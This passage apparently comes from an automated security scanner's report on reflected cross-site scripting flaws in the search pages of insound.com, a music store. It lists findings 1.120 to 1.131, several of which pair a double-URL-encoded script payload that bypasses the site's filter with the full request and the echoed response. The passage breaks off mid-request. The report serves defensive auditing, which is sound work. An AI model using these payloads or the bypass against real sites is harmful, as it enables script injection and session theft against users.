Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=334556894; expires=Sun, 09-Jan-2011 02:38:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=431404204; expires=Sun, 09-Jan-2011 02:38:06 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Daft Punk33d1e"><script>alert(1)</script>256a07ce2f9" />
...[SNIP]...

1.120. http://www.insound.com/search/query/Daft%20Punk&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Daft%20Punk&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 9d327%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb06fa55ef91 was submitted in the REST URL parameter 3. This input was echoed as 9d327</title><script>alert(1)</script>b06fa55ef91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Daft%20Punk9d327%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb06fa55ef91&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=3c6h702ufvbg3cr9ru43on6j92; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:12 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=403284738; expires=Sun, 09-Jan-2011 02:38:12 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=400013479; expires=Sun, 09-Jan-2011 02:38:12 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Daft Punk9d327</title><script>alert(1)</script>b06fa55ef91</title>
...[SNIP]...

1.121. http://www.insound.com/search/query/Dark%20Dark%20Dark&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Dark%20Dark%20Dark&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload ab7ba%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effa7d5727c3 was submitted in the REST URL parameter 3. This input was echoed as ab7ba</title><script>alert(1)</script>ffa7d5727c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Dark%20Dark%20Darkab7ba%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effa7d5727c3&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=chka8col27iqb0mj94hjoufan2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:55 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=48099327; expires=Sun, 09-Jan-2011 02:40:55 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=287098800; expires=Sun, 09-Jan-2011 02:40:55 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Dark Dark Darkab7ba</title><script>alert(1)</script>ffa7d5727c3</title>
...[SNIP]...

1.122. http://www.insound.com/search/query/Dark%20Dark%20Dark&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Dark%20Dark%20Dark&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21873%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec81f260ae87 was submitted in the REST URL parameter 3. This input was echoed as 21873"><script>alert(1)</script>c81f260ae87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Dark%20Dark%20Dark21873%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec81f260ae87&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=aqdk6l5q5i03umcpt4a1896u42; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:46 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=21567812; expires=Sun, 09-Jan-2011 02:40:46 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=302331938; expires=Sun, 09-Jan-2011 02:40:46 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Dark Dark Dark21873"><script>alert(1)</script>c81f260ae87" />
...[SNIP]...

1.123. http://www.insound.com/search/query/Das%20Racist&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Das%20Racist&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45a6a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e611d543f39a was submitted in the REST URL parameter 3. This input was echoed as 45a6a"><script>alert(1)</script>611d543f39a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Das%20Racist45a6a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e611d543f39a&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=4jf3b38qjcha0l98unh8oh3l76; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=63365012; expires=Sun, 09-Jan-2011 02:37:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=172428867; expires=Sun, 09-Jan-2011 02:37:22 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Das Racist45a6a"><script>alert(1)</script>611d543f39a" />
...[SNIP]...

1.124. http://www.insound.com/search/query/Das%20Racist&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Das%20Racist&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 4e8cb%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1c1d752e50d was submitted in the REST URL parameter 3. This input was echoed as 4e8cb</title><script>alert(1)</script>1c1d752e50d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Das%20Racist4e8cb%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1c1d752e50d&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=2gfbihfchnqsgb4dvcrdfjl9a6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:29 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=174579824; expires=Sun, 09-Jan-2011 02:37:29 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=84200231; expires=Sun, 09-Jan-2011 02:37:29 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36837

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Das Racist4e8cb</title><script>alert(1)</script>1c1d752e50d</title>
...[SNIP]...

1.125. http://www.insound.com/search/query/Deerhunter&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Deerhunter&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 68d0e%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed1e899527 was submitted in the REST URL parameter 3. This input was echoed as 68d0e</title><script>alert(1)</script>ed1e899527 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Deerhunter68d0e%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed1e899527&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=7omhqihfrj5lm3st7ob0aehjb1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=455913808; expires=Sun, 09-Jan-2011 02:37:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=226681290; expires=Sun, 09-Jan-2011 02:37:22 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Deerhunter68d0e</title><script>alert(1)</script>ed1e899527</title>
...[SNIP]...

1.126. http://www.insound.com/search/query/Deerhunter&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Deerhunter&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cae0c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb67fa7d6406 was submitted in the REST URL parameter 3. This input was echoed as cae0c"><script>alert(1)</script>b67fa7d6406 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Deerhuntercae0c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb67fa7d6406&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=d5r7nd0bgr2g876klal4qq3411; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=419204218; expires=Sun, 09-Jan-2011 02:37:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=438247639; expires=Sun, 09-Jan-2011 02:37:16 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Deerhuntercae0c"><script>alert(1)</script>b67fa7d6406" />
...[SNIP]...

1.127. http://www.insound.com/search/query/Diamond%20Rings&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Diamond%20Rings&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload a33d8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a833c279fd was submitted in the REST URL parameter 3. This input was echoed as a33d8</title><script>alert(1)</script>6a833c279fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Diamond%20Ringsa33d8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a833c279fd&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=klrlto0i1c88teh5cmhu7v0d33; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:01 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=489386970; expires=Sun, 09-Jan-2011 02:41:01 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=163467593; expires=Sun, 09-Jan-2011 02:41:01 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Diamond Ringsa33d8</title><script>alert(1)</script>6a833c279fd</title>
...[SNIP]...

1.128. http://www.insound.com/search/query/Diamond%20Rings&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Diamond%20Rings&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2be0a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e213a1513519 was submitted in the REST URL parameter 3. This input was echoed as 2be0a"><script>alert(1)</script>213a1513519 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Diamond%20Rings2be0a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e213a1513519&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=0m0lbb9jd3huhpfjg0jlicuak4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:54 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=39895770; expires=Sun, 09-Jan-2011 02:40:54 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=360414629; expires=Sun, 09-Jan-2011 02:40:54 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Diamond Rings2be0a"><script>alert(1)</script>213a1513519" />
...[SNIP]...

1.129. http://www.insound.com/search/query/Dinosaur%20Jr.&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Dinosaur%20Jr.&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ba14%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecab2427d702 was submitted in the REST URL parameter 3. This input was echoed as 9ba14"><script>alert(1)</script>cab2427d702 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Dinosaur%20Jr.9ba14%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecab2427d702&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=k4hmmc0h0gf4rmj0ka0h98j3f5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=162281626; expires=Sun, 09-Jan-2011 02:37:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=278492688; expires=Sun, 09-Jan-2011 02:37:49 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Dinosaur Jr.9ba14"><script>alert(1)</script>cab2427d702" />
...[SNIP]...

1.130. http://www.insound.com/search/query/Dinosaur%20Jr.&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Dinosaur%20Jr.&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload eac63%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2b7a9dd033 was submitted in the REST URL parameter 3. This input was echoed as eac63</title><script>alert(1)</script>e2b7a9dd033 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Dinosaur%20Jr.eac63%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2b7a9dd033&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=oa8rvmvfkkqr86tln2ovsv8i82; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:55 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=551211424; expires=Sun, 09-Jan-2011 02:37:55 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=144886111; expires=Sun, 09-Jan-2011 02:37:55 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Dinosaur Jr.eac63</title><script>alert(1)</script>e2b7a9dd033</title>
...[SNIP]...

1.131. http://www.insound.com/search/query/Drake&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Drake&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 6b0e8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e17722ee5f98 was submitted in the REST URL parameter 3. This input was echoed as 6b0e8</title><script>alert(1)</script>17722ee5f98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Drake6b0e8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e17722ee5f98&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
